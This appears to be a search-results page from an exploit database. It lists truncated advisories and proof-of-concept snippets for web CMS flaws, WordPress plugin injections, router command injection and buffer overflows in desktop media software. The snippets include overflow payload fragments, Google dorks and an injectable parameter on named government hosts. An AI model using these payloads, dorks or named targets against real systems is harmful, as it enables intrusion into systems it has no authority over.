3100 matches found
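JEECMS: a generic broken access control issue
Brief description: 1 Detailed description: http://wooyun.org/bugs/wooyun-2015-096948 路人甲 has already dug out all the XSS, so we won't hunt for XSS any more; we are switching to hunting for authorization bypasses. The shipping address can be modified without authorization. Proof of vulnerability: http://wooyun.org/bugs/wooyun-2015-096948 路人甲 has already dug out all the XSS, so we won't hunt for XSS any more; we are switching to hunting for authorization bypasses. The shipping address can be modified without authorization...
Django Arbitrary File Download Vulnerability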
No description provided by source...
D-Link/TRENDnet NCC Service Command Injection Exploit
This Metasploit module exploits a remote command injection vulnerability on several routers. The vulnerability exists in the ncc service, while handling ping commands. This Metasploit module has been tested on a DIR-626L emulated environment only. Several D-Link and TRENDnet devices are reported ...
WordPress Windows Desktop And iPhone Photo Uploader File Upload
Exploit Title : WordPress plugin Windows Desktop and iPhone Photo Uploader arbitrary file upload vulnerability Author : Manish Kishan Tanwar AKA error1046 Home Page : https://wordpress.org/plugins/i-dump-iphone-to-wordpress-photo-uploader/ Download Link :...
WordPress Plugin SP Project Document Manager 2.5.3 - Blind SQL Injection
WordPress Plugin SP Project Document Manager 2.5.3 - Blind SQL Injection Exploit Title: WordPress SP Project & Document Manager 2.5.3 Blind SQL Injection Google Dork: inurl:wp-content/plugins/sp-client-document-manager Date: 2015-03-04 Exploit Author: catsecurity Vendor Homepage:...
TurboMail 6.0.0 /nicknamelogin.jsp Login Bypass Vulnerability
No description provided by source...
WordPress Gravity Forms 1.8.19 /include/upload.php File Upload Vulnerability
/includes/upload.php$filename = isset$REQUEST"name" ? $REQUEST"name" : ''; $fieldid = rgpost"fieldid"; $field = GFFormsModel::getfield$form, $fieldid; if empty $field die; // Clean the fileName for security reasons $filename = pregreplace'/^\w.+/', '', $filename; …. $tmpfilename = $formuniqueid...
Fraction Theme < 1.1.2 - Privilege Escalation
This vulnerability allows an attacker either authenticated or unauthenticated to escalate privileges on the site and have an admin account which may lead to a full site takeover. This will enable user registration: https://example.com/wp-admin/admin-ajax.php?action=otsaveoptions&userscanregister=...
Clipbucket 2.7 RC3 0.9 - Blind SQL Injection Vulnerability
Exploit for php platform in category web applications Exploit Title : Clipbucket 2.7 RC3 0.9 Blind SQL Injection Date : 20 February 2015 Exploit Author : CWH Underground Site : www.2600.in.th Vendor Homepage : http://clip-bucket.com/ Software Link :...
Pentaho < 4.5.0 - User Console XML Injection
======================================================================== title: Pentaho User Console XML Injection Vulnerability program: Pentaho BI User Console vulnerable version: Pentaho was injected into the XML of the client's POST request. This tag defines an external entity, xxe8295c, whic...
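YXcms site-building system, latest version: stored XSS blind attack on the admin backend (demo + local demonstration)
Brief description: I need a portable hard drive to store videos. Detailed description: My last submission was rejected as self-XSS, so to prove it is not self-XSS, this time I will blind-hit the admin backend. Demo: first go to the YXCMS demo site http://demo.yxcms.net, then register an account and insert "/ directly in the email field. You can see there is no filtering at all, and it simply reports that the information was edited successfully. After going back, the popup fires immediately. Last time I stopped here and did not check whether the backend could be hit, because this demo does not offer a backend demonstration (maybe they are afraid of someone getting a shell through the backend, haha https://images.seebug.org/upload/201501/20104758ae72a78e0...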
ArticleFR CMS 3.0.5 - SQL Injection
Exploit Title: SQL injection vulnerability in articleFR CMS 3.0.5 Google Dork: N/A Date: 01/21/2015 Exploit Author: Tran Dinh Tien [email protected] & ITAS Team www.itas.vn Vendor Homepage: http://freereprintables.com Software Link: https://github.com/articlefr/articleFR Version: version 3.0.5...
Orbital-Viewer-1.04-(.ov)
Pro: Orbital Viewer v1.04 .orb/.ov Local Universal Stack Overflow Exploit SEH Author: CrazyHacker Download: http://www.orbitals.com/orb/setupov.exe Date: 20-6-2010 $junk = 6060; $header = "OrbitalFileV1.0\n"; $nseh = "\xeb\xf9\xff\xff"; jmp back 7 bytes $seh = "\x0b\x0b\x27\x00"; universal pop eb...
Microsoft-Excel-OBJ-Record
Title: Microsoft Excel OBJ Record Stack Overflow Version: Excel 2002 and XP SP3 Analysis: http://www.abysssec.com import sys def main: try: fdR = open'src.xls', 'rb+' strTotal = fdR.read str1 = strTotal:36640 str2 = strTotal37440: shellcode calc.exe shellcode =...
Acoustica-Audio-Converter-Pro-1.1
Exploit Title: Acoustica Audio Converter Pro 1.1 build 25 Heap Overflow.mp3.wav.ogg.wma PoC Date: September 21 2010 Author: Carlos Hollmann Software Link: http://www.acoustica.com/audio-converter/download.htm m3u = "crash.m3u" payload =...
FatPlayer-0.6b-(.wav)
Exploit Title: FatPlayer 0.6b Malicious WAV Buffer Overflow Vulnerability SEH Date: 10/18/10 Author: james AT learnsecurityonline DOT com Software Link: http://sourceforge.net/projects/fatplayer/files/ Version: 0.6 Beta junk = "\x41" 4132 nSEH = "\x90\x90\xeb\x06" SEH = 0x0046bee3.pack'V' pop pop...
AVM Fritz!box Auto Exploiter
?php echo " +++++++++++++++++++++++++++++++++++++++++++++++ ++ Fritz!Box Fucker ++ ++ By ++ ++ BaD-HaCKeR-MaN ++ +++++++++++++++++++++++++++++++++++++++++++++++ "; settimelimit0; errorreporting0; function func1$url $curl=curlinit; curlsetopt$curl, CURLOPTRETURNTRANSFER,1; curlsetopt$curl,...
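Oracle SQL injection in a large government service system (widely deployed)
Brief description: As the title says, hoho. Working pretty hard for living expenses.... Detailed description: Affected vendor: 深圳太极软件有限公司. A dedicated government-affairs service system. User base: large. Impact: wide. Injection point: browsebgxz.do?method=dept&deptid= (the deptid parameter is injectable). Google keyword: inurl:browsebgxz.do?method= Cases: http://www.gygxzw.gov.cn:8066/browsebgxz.do?method=dept&deptid=556631684 http://61.189.156.73/browsebgxz.do?method=dept&deptid=0094204...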
Free-MP3-CD-Ripper-1.1
Exploit Title : Free MP3 CD Ripper 1.1 Local Buffer Overflow Software : http://www.brothersoft.com/free-mp3-cd-ripper-84543.html Version : 1.1 Tested on : Windows xp sp3 en Date : 27/08/2011 Author : X-h4ck Website : http://www.pirate.al , http://theflashcrew.blogspot.com Email : [email protected]...
Mini-stream-RM-MP3-Converter-3.1.2.2
Author : SkY-NeT SySteMs Software Link : http://mini-stream.net/rm-to-mp3-converter/download/ Version : 3.1.2.2 Tested on : Xp Sp 2 import os,sys header= "http://." junk= "\x41" 17416 A ESP = "\x13\x44\x87\x7C" 7C874413 FFE4 JMP ESP NOPS = "\x90" 16 ShellCode =...